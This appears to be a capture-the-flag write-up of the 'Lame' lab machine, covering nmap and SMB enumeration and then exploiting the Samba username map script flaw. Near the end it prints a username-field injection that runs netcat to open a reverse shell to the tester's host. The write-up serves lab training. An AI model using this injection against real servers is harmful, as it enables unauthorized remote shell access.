Hi everyone
Today we are going to look for a Linux Box called Lame which is rated as easy in terms of difficulty. This machine has various phases: Recon, Enumeration and Exploitation.
Box Type: Linux
Recon & Enumeration
Enumeration plays a very significant role in pen testing. The more properly you enumerate the more it will be easy to get a foothold on the target.
First, we will check whether target is reachable or not with ping command:
ping Target_IP
With ping command output we found that the target is reachable.
Now let’s move ahead and run the port scan for which we will be using Nmap a popular tool for port scanning and it will provide details of the various ports which are in Open state. The command for that will be:
nmap -sC -sV -O -oA nmap/initial 10.129.144.85
Now let’s also execute the full scan:
nmap -sC -sV -O -p- -oA nmap/full 10.129.144.85 -T4
We discovered these ports are open:
- 21/tcp – FTP service running vsftpd 2.3.4
- 22/tcp – SSH Service running OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
- 139/tcp – netbios-ssn service running Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- 445/tcp – netbios-ssn service running Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
- 3632/tcp – distccd running service distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
- OS: Linux
Let’s move ahead and check the ftp service:
After that I went ahead and checked for exploits through searchsploit:
The above output tells that the machine is not vulnerable to the vsftpd backdoor.
Now after that I used tool called SMBClient that allows you to interact with SMB (Server Message Block) shares on remote systems. I used the following command to list the SMB shares available on a target system:
smbclient -L 10.129.144.85
Then I used another tool called smbmap for enumerating and interacting with SMB (Server Message Block) shares.I used the following command and check the permissions for the share drives:
smbmap -H 10.129.144.85 and I can see that the tmp folder has READ, WRITE access:
Exploitation
I started looking for the exploits and found one , the link is mentioned below:
https://www.exploit-db.com/exploits/16320
The vulnerability exists in the username map script functionality. The script executes the following command, where “payload.encoded” represents a reverse shell payload that establishes a connection back to our authorized penetration testing machine.
username = “/=nohup " + payload.encoded + "“
logon “./=nohup nc -nv 10.10.14.69 7779 -e /bin/bash“
The above image shows that user.txt flag.
Key Takeaways
- Anonymous SMB access should be restricted
- Service accounts should follow principle of least privilege
If you enjoyed this post, share it with your friends and colleagues!